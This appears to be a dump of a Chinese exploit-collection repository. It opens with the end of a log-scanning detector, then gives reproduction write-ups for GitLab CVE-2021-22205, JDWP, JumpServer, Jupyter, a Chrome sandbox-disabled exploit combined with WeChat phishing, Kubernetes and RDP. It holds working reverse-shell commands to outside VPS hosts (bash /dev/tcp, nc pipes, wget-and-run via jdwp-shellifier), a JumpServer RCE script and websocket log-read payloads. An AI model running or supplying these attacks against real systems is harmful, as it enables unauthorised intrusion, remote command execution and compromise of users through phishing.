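    rec["decoded"] = unquote(unquote(rec["target"]))
    return rec


def classify(decoded_target):
    """Return the list of signature labels that a decoded request target triggers."""
    path = decoded_target.partition("?")[0]
    labels = [label for pattern, label in SIGNATURES if pattern.search(path)]
    if TRAVERSAL_RE.search(decoded_target):
        labels.append("directory traversal sequence in request")
    return labels


def scan_log(lines):
    """Scan log lines; return (findings, distinct-signature count per client IP).

    A client that trips several distinct signatures is scanning rather than stumbling;
    a 200 on a disclosure path means the endpoint answered and needs a closer look.
    """
    findings = []
    per_ip = defaultdict(set)
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        for label in classify(rec["decoded"]):
            findings.append({
                "ip": rec["ip"],
                "time": rec["time"],
                "status": int(rec["status"]),
                "target": rec["target"],
                "label": label,
            })
            per_ip[rec["ip"]].add(label)
    return findings, {ip: len(labels) for ip, labels in per_ip.items()}


# Constructed sample log lines (RFC 5737 documentation addresses), not real traffic.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Oct/2023:13:55:36 +0000] "GET /rest/api/2/user/picker?query=admin HTTP/1.1" 200 512
203.0.113.7 - - [10/Oct/2023:13:55:37 +0000] "GET /s/anything/_/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml HTTP/1.1" 200 2048
203.0.113.7 - - [10/Oct/2023:13:55:38 +0000] "GET /jsp/help-sb-download.jsp?sbFileName=..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1" 200 1732
198.51.100.9 - - [10/Oct/2023:14:01:02 +0000] "GET /.git/HEAD HTTP/1.1" 404 153
192.0.2.44 - - [10/Oct/2023:14:02:10 +0000] "GET /browse/PROJ-1 HTTP/1.1" 200 9876
not a log line
""".splitlines()

if __name__ == "__main__":
    hits, counts = scan_log(SAMPLE_LOG)
    for hit in hits:
        print(f'{hit["ip"]} {hit["status"]} {hit["label"]}: {hit["target"]}')
    for ip, n in sorted(counts.items(), key=lambda kv: -kv[1]):
        print(f"{ip}: {n} distinct signature(s)")
```

The signature table is deliberately narrow; on a real Jira or GitLab host the same loop can be fed from a path list maintained alongside the patch inventory.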
--------------------------------------------------------------------------------
/GitLab/GitLab exiftool未授权远程命令执行漏洞(CVE-2021-22205)/pic/2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ybdt/exp-hub/cdb6c460c0a611edb7e86f5065f1723638f2a3fb/GitLab/GitLab exiftool未授权远程命令执行漏洞(CVE-2021-22205)/pic/2.png
--------------------------------------------------------------------------------
/GitLab/GitLab exiftool未授权远程命令执行漏洞(CVE-2021-22205)/pic/3.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ybdt/exp-hub/cdb6c460c0a611edb7e86f5065f1723638f2a3fb/GitLab/GitLab exiftool未授权远程命令执行漏洞(CVE-2021-22205)/pic/3.png
--------------------------------------------------------------------------------
/GitLab/GitLab exiftool未授权远程命令执行漏洞(CVE-2021-22205)/pic/4.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ybdt/exp-hub/cdb6c460c0a611edb7e86f5065f1723638f2a3fb/GitLab/GitLab exiftool未授权远程命令执行漏洞(CVE-2021-22205)/pic/4.png
--------------------------------------------------------------------------------
/GitLab/GitLab exiftool未授权远程命令执行漏洞(CVE-2021-22205)/pic/5.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ybdt/exp-hub/cdb6c460c0a611edb7e86f5065f1723638f2a3fb/GitLab/GitLab exiftool未授权远程命令执行漏洞(CVE-2021-22205)/pic/5.png
--------------------------------------------------------------------------------
/GitLab/GitLab exiftool未授权远程命令执行漏洞(CVE-2021-22205)/pic/a.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ybdt/exp-hub/cdb6c460c0a611edb7e86f5065f1723638f2a3fb/GitLab/GitLab exiftool未授权远程命令执行漏洞(CVE-2021-22205)/pic/a.png
--------------------------------------------------------------------------------
/GitLab/GitLab exiftool未授权远程命令执行漏洞(CVE-2021-22205)/pic/readme.md:
--------------------------------------------------------------------------------

--------------------------------------------------------------------------------
/GitLab/GitLab exiftool未授权远程命令执行漏洞(CVE-2021-22205)/readme.md:
--------------------------------------------------------------------------------
# 0x01 Affected versions
Gitlab CE/EE < 13.10.3
Gitlab CE/EE < 13.9.6
Gitlab CE/EE < 13.8.8
# 0x02 Environment setup
Environment used: CentOS7.6.1810_x64_en-us
Download the rpm package: https://packages.gitlab.com/gitlab/gitlab-ce/packages/ol/7/gitlab-ce-13.10.1-ce.0.el7.x86_64.rpm
Install: sudo rpm -i ./gitlab-ce-13.10.1-ce.0.el7.x86_64.rpm
First configuration change: sudo vim /etc/gitlab/gitlab.rb
```
external_url 'http://192.168.202.133:1028'
nginx['listen_addresses'] = ['*', '[::]']
nginx['listen_port'] = 1028
nginx['listen_https'] = false
```
Second configuration change: sudo vim /opt/gitlab/embedded/conf/nginx.conf
```
server {
  listen *:1028;
  server_name 192.168.202.133;
  if ($http_host = "") {
    set $http_host_with_default "ip:1028";
  }
```
Temporarily stop the firewall
```
sudo systemctl stop firewalld
systemctl status firewalld
```
Reload the configuration
```
gitlab-ctl reconfigure
```
Restart GitLab
```
gitlab-ctl restart
```
Once configured, visiting the target address looks like this
![image](./pic/1.png)
The first visit requires a password change; the password changed here belongs to the administrator user admin@example.com
Register a new user through the sign-up function on the login page, log in as the administrator to approve the registration request, and finally log in as the ordinary user, as shown below
![image](./pic/2.png)
# 0x03 Reproduction 1 (authentication required)
Reproducing the vulnerability directly with the tool [https://github.com/mr-r3bot/Gitlab-CVE-2021-22205](https://github.com/mr-r3bot/Gitlab-CVE-2021-22205) has two minor issues
1. When the administrator is used as the authenticating user, the program throws an error, as shown below
![image](./pic/a.png)
Judging from the vulnerability's basic principle and the error message, the likely cause is that the HTML of the administrator's page differs from the HTML of an ordinary user's page
2. When an ordinary user is used as the authenticating user, it reports that the RCE was triggered successfully, but there is no output, as shown below
![image](./pic/3.png)
Change the exploitation method to creating a file, with the following command
```
python3 ./exploit.py -u ybdtd -p nihaomadadada -t http://192.168.202.133:1028 -c "touch ybdtybdt.txt"
```

It reports that the RCE was triggered; checking on the server, the file was indeed created, owned by the git user, as shown below
![image](./pic/4.png)
# 0x04 Reproduction 2 (no authentication required)
The reason no authentication is needed is that a request can first be sent to [http://192.168.202.133:1028/users/sign_in](http://192.168.202.133:1028/users/sign_in) to obtain the following token
```


```
Then, carrying that token, the upload endpoint can be reached without logging in

Using the tool: https://github.com/Al1ex/CVE-2021-22205
Start a listener on the VPS
```
nc -lnvvvp 1024
```
Run the following command to get a reverse shell
```
python3 ./CVE-2021-22205.py -a true -t http://192.168.202.133:1028 -c "bash -i >& /dev/tcp/xx.xx.xx.xx/1024 0>&1"
```
Reverse shell received successfully, as shown below
![image](./pic/5.png)
# 0x05 References
https://mp.weixin.qq.com/s/cy8OOzHD28Of3zC32S_4ow
https://blog.csdn.net/yzd524850313/article/details/113118193
https://www.jianshu.com/p/56541f6c01a5
https://www.cnblogs.com/ybit/p/14918949.html
https://blog.csdn.net/smellycat000/article/details/121005824

--------------------------------------------------------------------------------
/Google/Google Chrome 0day漏洞(暂无编号)/pic/0.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ybdt/exp-hub/cdb6c460c0a611edb7e86f5065f1723638f2a3fb/Google/Google Chrome 0day漏洞(暂无编号)/pic/0.png
--------------------------------------------------------------------------------
/Google/Google Chrome 0day漏洞(暂无编号)/pic/1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ybdt/exp-hub/cdb6c460c0a611edb7e86f5065f1723638f2a3fb/Google/Google Chrome 0day漏洞(暂无编号)/pic/1.png
--------------------------------------------------------------------------------
/Google/Google Chrome 0day漏洞(暂无编号)/pic/readme.md:
--------------------------------------------------------------------------------

--------------------------------------------------------------------------------
/Google/Google Chrome 0day漏洞(暂无编号)/readme.md:
--------------------------------------------------------------------------------
1. Check that the current Chrome version is the latest, 89.0.4389.114 (64-bit), as shown below
![image](./pic/0.png)

2. Run Chrome without the sandbox: in PowerShell, change to the Chrome installation directory and run
```
.\chrome.exe --no-sandbox
```

3. After it starts, open exploit.html in the browser, as shown below
![image](./pic/1.png)

--------------------------------------------------------------------------------
/Google/Google Chrome 0day配合微信钓鱼实现CS上线漏洞(暂无编号)/pic/0.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ybdt/exp-hub/cdb6c460c0a611edb7e86f5065f1723638f2a3fb/Google/Google Chrome 0day配合微信钓鱼实现CS上线漏洞(暂无编号)/pic/0.png
--------------------------------------------------------------------------------
/Google/Google Chrome 0day配合微信钓鱼实现CS上线漏洞(暂无编号)/pic/1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ybdt/exp-hub/cdb6c460c0a611edb7e86f5065f1723638f2a3fb/Google/Google Chrome 0day配合微信钓鱼实现CS上线漏洞(暂无编号)/pic/1.png
--------------------------------------------------------------------------------
/Google/Google Chrome 0day配合微信钓鱼实现CS上线漏洞(暂无编号)/pic/2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ybdt/exp-hub/cdb6c460c0a611edb7e86f5065f1723638f2a3fb/Google/Google Chrome 0day配合微信钓鱼实现CS上线漏洞(暂无编号)/pic/2.png
--------------------------------------------------------------------------------
/Google/Google Chrome 0day配合微信钓鱼实现CS上线漏洞(暂无编号)/pic/readme.md:
--------------------------------------------------------------------------------

--------------------------------------------------------------------------------
/Google/Google Chrome 0day配合微信钓鱼实现CS上线漏洞(暂无编号)/readme.md:
--------------------------------------------------------------------------------
Principle: WeChat's built-in browser uses the Chromium engine, and web pages are opened with the sandbox disabled by default
WeChat version 3.2.1.132, as shown below:
![image](./pic/2.png)

Start a local HTTP server (I used phpstudy), put wechat-exploit.html into the web directory, open the link in WeChat, and CS receives the callback shell, as shown below
![image](./pic/0.png)
![image](./pic/1.png)

References:
https://mp.weixin.qq.com/s/LOpAu8vs8ob85W3sCmXMew
https://mp.weixin.qq.com/s/TC9EDiiZnxGeyM7BP9wZYQ

--------------------------------------------------------------------------------
/JBOSS/JBoss漏洞集合.md:
--------------------------------------------------------------------------------
The JBoss version can be identified with Wappalyzer
![image](./pic/01.png)

```
/jmx-console/HtmlAdaptor
/invoker/EJBInvokerServlet
/jmx-console/
```

JBoss 4.x (4.0.5) endpoint fingerprint
```
/jbossmq-httpil/HTTPServerILServlet
```

JBoss 5.x / 6.x
```
/invoker/readonly
```

JBoss JMXInvokerServlet
```
/invoker/JMXInvokerServlet
```

# References
https://blog.csdn.net/Aaron_Miller/article/details/106624809
https://si1ent.xyz/2020/07/05/Jboss漏洞汇总/
--------------------------------------------------------------------------------
/JBOSS/pic/01.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ybdt/exp-hub/cdb6c460c0a611edb7e86f5065f1723638f2a3fb/JBOSS/pic/01.png
--------------------------------------------------------------------------------
/JDWP/JDWP远程代码执行漏洞(暂无编号)/pic/1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ybdt/exp-hub/cdb6c460c0a611edb7e86f5065f1723638f2a3fb/JDWP/JDWP远程代码执行漏洞(暂无编号)/pic/1.png
--------------------------------------------------------------------------------
/JDWP/JDWP远程代码执行漏洞(暂无编号)/pic/readme.md:
--------------------------------------------------------------------------------

--------------------------------------------------------------------------------
/JDWP/JDWP远程代码执行漏洞(暂无编号)/readme.md:
--------------------------------------------------------------------------------
# 0x01 Initial discovery
An nmap scan of a certain IP's /24 took about 19h; going through the identified fingerprints one by one, the following was found
```
5005/tcp open jdwp Java Debug Wire Protocol (Reference Implementation) version 1.8 1.8.0_191
|_jdwp-info: ERROR: Script execution failed (use -d to debug)
```
I had reproduced the JDWP vulnerability before, hence this write-up

# 0x02 Quick verification
telnet 106.53.xx.xx 5005
If JDWP-Handshake is returned, the vulnerability exists
In my case JDWP-Handshake was not returned; ignore that and keep trying to exploit
# 0x03 dnslog test
1. First try a dnslog probe
PoC download: https://github.com/IOActive/jdwp-shellifier
Run the following command
```
python2 jdwp-shellifier.py -t 192.168.3.118 -p 8787 --break-on "java.lang.String.indexof" --cmd "ping xx.dnslog.cn"
```
The dnslog platform received the callback; looks promising
# 0x04 Attempting a reverse shell
Save the following as shell.txt, put it on the VPS, and serve it with a temporary HTTP server started with python3
```
nc 192.168.178.129 3333 | /bin/bash | nc 192.168.178.129 4444%
```
Start listeners; two are needed, the first to type commands into and the second to receive the command output
```
Note: on an Alibaba Cloud VPS, nc needs the n option when listening, otherwise it errors out

nc -lnvvp 3333
nc -lnvvp 4444
```
Use the PoC to download the shell, make the file executable, and run it
```
python2 jdwp-shellifier.py -t 192.168.178.128 -p 8000 --break-on "java.lang.String.indexof" --cmd "wget http://192.168.178.129:8000/shell.txt -O /tmp/shell.sh"
python2 jdwp-shellifier.py -t 192.168.178.128 -p 8000 --break-on "java.lang.String.indexof" --cmd "chmod a+x /tmp/shell.sh"
python2 jdwp-shellifier.py -t 192.168.178.128 -p 8000 --break-on "java.lang.String.indexof" --cmd "/tmp/shell.sh"
```
All three ran, but the VPS received no reverse shell
On reflection, the payload uses nc to connect to the VPS and the target may not have nc; I switched to sh and changed shell.txt to
```
sh -i >& /dev/tcp/101.200.xx.xx/3333 0>&1 | /bin/sh | sh -i >& /dev/tcp/101.200.xx.xx/4444 0>&1%
```
Reverse shell received successfully, as shown below
![image](./pic/1.png)

# 0x05 References:
https://blog.csdn.net/weixin_43486390/article/details/114259762

--------------------------------------------------------------------------------
/JumpServer/JumpServer任意用户密码重置(CVE-2023-42820)/01.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ybdt/exp-hub/cdb6c460c0a611edb7e86f5065f1723638f2a3fb/JumpServer/JumpServer任意用户密码重置(CVE-2023-42820)/01.png
--------------------------------------------------------------------------------
/JumpServer/JumpServer任意用户密码重置(CVE-2023-42820)/JumpServer任意用户密码重置(CVE-2023-42820).md:
--------------------------------------------------------------------------------
# Root cause
```
The third-party library django-simple-captcha exposes its random seed, which can be read through an API, so the captcha used when resetting a password can be guessed and the password can then be reset
```

# Affected versions
```
v2.24 <= version <= v3.6.4

Patched Version
>= v2.28.19, >= v3.6.5
```

# Vulnerability reproduction
For the reproduction steps just follow P牛 (phith0n)'s write-up; to keep things green I won't repeat them here, only a few lessons learned after reproducing
```
My first attempt failed; the second one succeeded

Because the current jumpserver environment manages few assets, 10 requests were enough to guess the password-reset captcha; in a real attack, a large number of requests may be needed

Exploitation requires knowing the username and email address, a precondition that makes this vulnerability somewhat impractical
```
Finally, a screenshot of successful exploitation
![image](./01.png)


# Reference
```
https://github.com/vulhub/vulhub/tree/master/jumpserver/CVE-2023-42820
https://github.com/jumpserver/jumpserver/security/advisories/GHSA-7prv-g565-82qp
```
--------------------------------------------------------------------------------
/JumpServer/JumpServer远程代码执行漏洞(暂无编号)/0.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ybdt/exp-hub/cdb6c460c0a611edb7e86f5065f1723638f2a3fb/JumpServer/JumpServer远程代码执行漏洞(暂无编号)/0.png
--------------------------------------------------------------------------------
/JumpServer/JumpServer远程代码执行漏洞(暂无编号)/a0.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ybdt/exp-hub/cdb6c460c0a611edb7e86f5065f1723638f2a3fb/JumpServer/JumpServer远程代码执行漏洞(暂无编号)/a0.png
--------------------------------------------------------------------------------
/JumpServer/JumpServer远程代码执行漏洞(暂无编号)/a1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ybdt/exp-hub/cdb6c460c0a611edb7e86f5065f1723638f2a3fb/JumpServer/JumpServer远程代码执行漏洞(暂无编号)/a1.png
--------------------------------------------------------------------------------
/JumpServer/JumpServer远程代码执行漏洞(暂无编号)/jumpserver-rce.py:
--------------------------------------------------------------------------------
# -*- coding: utf-8 -*-
# import requests
# import json
# data={"user":"4320ce47-e0e0-4b86-adb1-675ca611ea0c","asset":"ccb9c6d7-6221-445e-9fcc-b30c95162825","system_user":"79655e4e-1741-46af-a793-fff394540a52"}
#
# url_host='http://192.168.1.73:8080'
#
# def get_token():
#     url = url_host+'/api/v1/users/connection-token/?user-only=1'
#     url =url_host+'/api/v1/authentication/connection-token/?user-only=1'
#     response = requests.post(url, json=data).json()
#     print(response)
#     ret=requests.get(url_host+'/api/v1/authentication/connection-token/?token=%s'%response['token'])
#     print(ret.text)
# get_token()
import asyncio
import websockets
import requests
import json
url = "/api/v1/authentication/connection-token/?user-only=None"

# Send a message to the server after authentication
async def send_msg(websocket,_text):
    if _text == "exit":
        print(f'you have enter "exit", goodbye')
        await websocket.close(reason="user exit")
        return False
    await websocket.send(_text)
    recv_text = await websocket.recv()
    print(f"{recv_text}")

# Client main logic
async def main_logic(cmd):
    print("#######start ws")
    async with websockets.connect(target) as websocket:
        recv_text = await websocket.recv()
        print(f"{recv_text}")
        resws=json.loads(recv_text)
        id = resws['id']
        print("get ws id:"+id)
        print("###############")
        print("init ws")
        print("###############")
        inittext = json.dumps({"id": id, "type": "TERMINAL_INIT", "data": "{\"cols\":164,\"rows\":17}"})
        await send_msg(websocket,inittext)
        for i in
range(20): 47 | recv_text = await websocket.recv() 48 | print(f"{recv_text}") 49 | print("###############") 50 | print("exec cmd: ls") 51 | cmdtext = json.dumps({"id": id, "type": "TERMINAL_DATA", "data": cmd+"\r\n"}) 52 | print(cmdtext) 53 | await send_msg(websocket, cmdtext) 54 | for i in range(20): 55 | recv_text = await websocket.recv() 56 | print(f"{recv_text}") 57 | print('#######finish') 58 | 59 | 60 | if __name__ == '__main__': 61 | try: 62 | import sys 63 | host=sys.argv[1] 64 | cmd=sys.argv[2] 65 | if host[-1]=='/': 66 | host=host[:-1] 67 | print(host) 68 | data = {"user": "4320ce47-e0e0-4b86-adb1-675ca611ea0c", "asset": "ccb9c6d7-6221-445e-9fcc-b30c95162825", 69 | "system_user": "79655e4e-1741-46af-a793-fff394540a52"} 70 | print("##################") 71 | print("get token url:%s" % (host + url,)) 72 | print("##################") 73 | res = requests.post(host + url, json=data) 74 | token = res.json()["token"] 75 | print("token:%s", (token,)) 76 | print("##################") 77 | target = "ws://" + host.replace("http://", '') + "/koko/ws/token/?target_id=" + token 78 | print("target ws:%s" % (target,)) 79 | asyncio.get_event_loop().run_until_complete(main_logic(cmd)) 80 | except: 81 | print("python jumpserver.py http://192.168.1.73 whoami") -------------------------------------------------------------------------------- /JumpServer/JumpServer远程代码执行漏洞(暂无编号)/quick_start.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | # 3 | 4 | flag=0 5 | 6 | echo -ne "User Check \t........................ " 7 | isRoot=`id -u -n | grep root | wc -l` 8 | if [ "x$isRoot" == "x1" ]; then 9 | echo -e "[\033[32m OK \033[0m]" 10 | else 11 | echo -e "[\033[31m ERROR \033[0m] 请用 root 用户执行安装脚本" 12 | flag=1 13 | fi 14 | 15 | echo -ne "OS Check \t........................ " 16 | if [ -f /etc/redhat-release ]; then 17 | osVersion=`cat /etc/redhat-release | grep -oE '[0-9]+\.[0-9]+'` 18 | majorVersion=`echo $osVersion | awk -F. 
'{print $1}'` 19 | if [ "x$majorVersion" == "x" ]; then 20 | echo -e "[\033[31m ERROR \033[0m] 操作系统类型版本不符合要求,请使用 CentOS 7 64 位版本" 21 | flag=1 22 | else 23 | if [[ $majorVersion == 7 ]]; then 24 | is64bitArch=`uname -m` 25 | if [ "x$is64bitArch" == "xx86_64" ]; then 26 | echo -e "[\033[32m OK \033[0m]" 27 | else 28 | echo -e "[\033[31m ERROR \033[0m] 操作系统必须是 64 位的,32 位的不支持" 29 | flag=1 30 | fi 31 | else 32 | echo -e "[\033[31m ERROR \033[0m] 操作系统类型版本不符合要求,请使用 CentOS 7" 33 | flag=1 34 | fi 35 | fi 36 | else 37 | echo -e "[\033[31m ERROR \033[0m] 操作系统类型版本不符合要求,请使用 CentOS 7" 38 | flag=1 39 | fi 40 | echo -ne "CPU Check \t........................ " 41 | processor=`cat /proc/cpuinfo| grep "processor"| wc -l` 42 | if [ $processor -lt 2 ]; then 43 | echo -e "[\033[31m ERROR \033[0m] CPU 小于 2核,JumpServer 所在机器的 CPU 需要至少 2核" 44 | flag=1 45 | else 46 | echo -e "[\033[32m OK \033[0m]" 47 | fi 48 | 49 | echo -ne "Memory Check \t........................ " 50 | memTotal=`cat /proc/meminfo | grep MemTotal | awk '{print $2}'` 51 | if [ $memTotal -lt 7500000 ]; then 52 | echo -e "[\033[31m ERROR \033[0m] 内存小于 8G,JumpServer 所在机器的内存需要至少 8G" 53 | flag=1 54 | else 55 | echo -e "[\033[32m OK \033[0m]" 56 | fi 57 | if [ $flag -eq 1 ]; then 58 | echo "安装环境检测未通过,请查阅上述环境检测结果" 59 | exit 1 60 | fi 61 | which wget >/dev/null 2>&1 62 | if [ $? -ne 0 ];then 63 | yum install -y wget 64 | fi 65 | 66 | Version=$(curl -s 'https://api.github.com/repos/jumpserver/installer/releases/latest' | grep "tag_name" | head -n 1 | awk -F ":" '{print $2}' | sed 's/\"//g;s/,//g;s/ //g') 67 | 68 | cd /opt 69 | if [ ! 
-d "/opt/jumpserver-installer-$Version" ]; then 70 | wget https://github.com/jumpserver/installer/releases/download/$Version/jumpserver-installer-$Version.tar.gz || { 71 | rm -rf /opt/jumpserver-installer-$Version.tar.gz 72 | echo -e "\033[31m [ERROR] 下载 jumpserver-installer 失败, 请检查网络是否正常或尝试重新执行脚本 \033[0m" 73 | exit 1 74 | } 75 | tar -xf /opt/jumpserver-installer-$Version.tar.gz -C /opt || { 76 | rm -rf /opt/jumpserver-installer-$Version 77 | echo -e "\033[31m [ERROR] 解压 jumpserver-installer 失败, 请检查网络是否正常或尝试重新执行脚本 \033[0m" 78 | exit 1 79 | } 80 | rm -rf /opt/jumpserver-installer-$Version.tar.gz 81 | fi 82 | 83 | cd /opt/jumpserver-installer-$Version 84 | 85 | JMS_Version="v2.6.1" 86 | 87 | sed -i "s/VERSION=.*/VERSION=$JMS_Version/g" /opt/jumpserver-installer-$Version/static.env 88 | 89 | echo "" 90 | echo -e "\033[33m JumpServer 部署脚本已经下载至 /opt/jumpserver-installer-$Version 目录 \n \033[0m" 91 | sleep 5s 92 | 93 | export DOCKER_IMAGE_PREFIX=docker.mirrors.ustc.edu.cn 94 | ./jmsctl.sh install 95 | -------------------------------------------------------------------------------- /JumpServer/JumpServer远程代码执行漏洞(暂无编号)/readme.md: -------------------------------------------------------------------------------- 1 | # 0x00 软件介绍 2 | JumpServer:一款在中国流行的开源堡垒机 3 | 4 | # 0x01 复现环境 5 | 复现环境:本地环境 centos7 x64 6 | 复现版本:JumpServer v2.6.1 7 | 环境搭建: 8 | 1、使用官方提供的v2.6.1的quick_start.sh安装后,竟然后v2.6.2,这个坑真是无语了,使用知识星球师傅提供的安装脚本,安装后是v2.6.1(这个安装脚本执行后可能会报错,多试几次),安装脚本被上载到当前目录下 9 | 2、执行quick_start.sh后,一路默认即可 10 | 3、安装完成后需要切换到/opt/jumpserver-installer-v2.6.1/下执行jmsctl.sh,直接使用绝对路径会报错 11 | 4、需要开启iptables,否则报错 12 | 5、重新安装2.6.1后,本地能访问,远程不能访问,无奈再次重新安装centos7以及JumpServer v2.6.1 13 | 14 | # 0x02 利用条件 15 | 无 16 | 17 | # 0x03 影响版本 18 | JumpServer < v2.6.2 19 | JumpServer < v2.5.4 20 | JumpServer < v2.4.5 21 | 22 | # 0x04 漏洞复现 23 | 攻击环境:kali x64 24 | chrome下安装扩展:https://chrome.google.com/webstore/detail/websocket-test-client/fgponpodhbmadfljofbimhhlengambbn/related 25 | 远程日志读取payload: 26 | ``` 27 | 
ws://192.168.1.73:8080/ws/ops/tasks/log/ 28 | {"task":"/opt/jumpserver/logs/jumpserver"} 29 | ``` 30 | 如下图,红色圈出的部分即为读取到的远程服务器上的日志内容 31 | ![image](./a1.png) 32 | 33 | 如下图,红色圈出的部分即为服务器上的日志内容 34 | ![image](./a0.png) 35 | 36 | 至于远程命令执行,首先需要在返回的信息中获取Taskid 37 | ``` 38 | ws://xx.xx.xx.xx:8080/ws/ops/tasks/log/ 39 | {"task":"/opt/jumpserver/logs/jumpserver"} 40 | ``` 41 | 如下图(下图摘自别人的文章) 42 | ![image](./0.png) 43 | 利用上一步得到的Taskid,可进行进一步的信息获取,将Taskid值send给接口,即可查看到当前任务的详细信息。 44 | ``` 45 | {"task":"dc0533d8-078a-47c0-b554-01f368a89a19"} 46 | ``` 47 | 可能有些小伙伴在复现读取Taskid信息时没有成功,我也一样,我们获取到的内容取决于日志记录的内容,一些Taskid可能已经失效了,在进行测试的时候可以看一下当前Taskid对应的时间,过于久远的id肯定是无法获取详情的。同理也能解释为什么在很多次测试中没有搜索到system_user这个字段,如果在实战中运气足够好,正好赶上管理员登陆了系统未退出,在日志中获取到system_user、user、asset这三个字段,则可以RCE,脚本参考jumpserver-rce.py 48 | 49 | 原理是模拟web terminal,前提需要user、system_user、assert这三个字段的值,这3个一般读取不到,利用难度较大 50 | 51 | # 0x05 批量脚本 52 | 无 53 | 54 | # 0x06 参考链接 55 | https://articles.zsxq.com/id_5raonmuwqrru.html 56 | https://mp.weixin.qq.com/s?__biz=MzI5ODk3OTM1Ng==&mid=2247497420&idx=1&sn=49b6179b24a4275f016a80b16ba401aa&chksm=ec9f2fbfdbe8a6a9318f7ba90eaca911692ae24f72591225efb19eab4852cf8e893936ee2a06&mpshare=1&scene=1&srcid=01183gic1iE9CgPOeU1ZKNoQ&sharer_sharetime=1610978241607&sharer_shareid=39e4b7efe0bb5b2e5770f3a926f3062d&exportkey=AUvxarwZSXcAl0lXgRSI%2F2o%3D&pass_ticket=rI5WvWxPWj9wFDSMj42xLhizShWaMpx4MwP7SFhDHLUZpJ0zrnUrOlEEfOlgFO8t&wx_header=0#rd 57 | -------------------------------------------------------------------------------- /Jupyter Notebook/Jupyter Notebook未授权访问导致RCE漏洞(暂无编号)/0.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ybdt/exp-hub/cdb6c460c0a611edb7e86f5065f1723638f2a3fb/Jupyter Notebook/Jupyter Notebook未授权访问导致RCE漏洞(暂无编号)/0.png -------------------------------------------------------------------------------- /Jupyter Notebook/Jupyter Notebook未授权访问导致RCE漏洞(暂无编号)/1.png: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/ybdt/exp-hub/cdb6c460c0a611edb7e86f5065f1723638f2a3fb/Jupyter Notebook/Jupyter Notebook未授权访问导致RCE漏洞(暂无编号)/1.png -------------------------------------------------------------------------------- /Jupyter Notebook/Jupyter Notebook未授权访问导致RCE漏洞(暂无编号)/readme.md: -------------------------------------------------------------------------------- 1 | # 0x00 复现环境 2 | 使用复现环境:360众测仿真实战靶场考试 3 | 其他复现环境:https://github.com/vulhub/vulhub/tree/master/jupyter/notebook-rce 4 | 5 | # 0x01 利用条件 6 | 无 7 | 8 | # 0x02 影响版本 9 | 全版本(只要管理员没有为web界面访问配置密码、ip限制等策略,都受影响) 10 | 11 | # 0x03 漏洞复现 12 | 由于考试时没有截图,故下图借用别人的图 13 | 14 | 新建一个terminal窗口,如图 15 | ![image](./0.png) 16 | 直接就RCE了,如图 17 | ![image](./1.png) 18 | 19 | # 0x04 踩坑记录 20 | 无 21 | 22 | # 参考链接 23 | https://www.cnblogs.com/mke2fs/p/12718499.html 24 | -------------------------------------------------------------------------------- /Kubernetes/Kubernetes容器逃逸漏洞(CVE-2022-0185)【记录】/readme.md: -------------------------------------------------------------------------------- 1 | 执行命令unshare,获知docker容器中是否有这个命令,有的话才可能有戏,利用漏洞CVE-2022-0185 2 | 3 | ``` 4 | docker run -it ubuntu:20.04 /bin/bash 5 | root@4e22094edd46:/# unshare 6 | unshare: unshare failed: Operation not permitted 7 | 8 | kubectl run -it ubutest2 --image=ubuntu:20.04 /bin/bash 9 | 10 | root@ubutest2:/# pscap -a 11 | ppid pid name command capabilities 12 | 0 1 root bash chown, dac_override, fowner, fsetid, kill, setgid, setuid, setpcap, net_bind_service, net_raw, sys_chroot, mknod, audit_write, setfcap 13 | 14 | root@ubutest2:/# unshare -r 15 | # pscap -a 16 | ppid pid name command capabilities 17 | 0 1 root bash chown, dac_override, fowner, fsetid, kill, setgid, setuid, setpcap, net_bind_service, net_raw, sys_chroot, mknod, audit_write, setfcap 18 | 1 270 root sh full 19 | ``` 20 | 21 | 参考连接: 22 | [https://www.4hou.com/posts/GWkK](https://www.4hou.com/posts/GWkK) 23 | 24 | 
PoC参见: 25 | [https://twitter.com/clubby789/status/1484482788313255939?s=20](https://twitter.com/clubby789/status/1484482788313255939?s=20) -------------------------------------------------------------------------------- /Microsoft/Microsoft IIS6.0远程代码执行漏洞(CVE-2017-7269)/readme.md: -------------------------------------------------------------------------------- 1 | 此篇文章之前已投稿到先知社区,此处不再赘述,地址:https://xz.aliyun.com/t/6485 2 | -------------------------------------------------------------------------------- /Microsoft/Microsoft RDP远程代码执行漏洞(CVE-2019-0708)/readme.md: -------------------------------------------------------------------------------- 1 | # 0x00 软件介绍 2 | Windows RDP:Windows下自带的一款远程桌面服务 3 | 4 | # 0x01 复现环境 5 | 使用环境:本地搭建的环境 6 | 复现版本:2008_r2_standard_zh-chs 7 | 8 | # 0x02 环境搭建 9 | 靶机环境:2008_r2_standard_zh-chs 10 | 11 | 前提条件: 12 | 2008_r2_standard_zh-chs修改注册表值项HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Terminal Server\WinStations\RDP-Tcp\fDisableCam的值为1 13 | (有的文章指出要修改的注册表值项为HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Terminal\Server\WinStations\rdpwd\fDisableCam,但我的系统没有值项rdpwd,而在项RDP-Tcp下有值项fDisableCam) 14 | 15 | # 0x03 利用条件 16 | Windows Server 2008 R2需要修改注册表 17 | 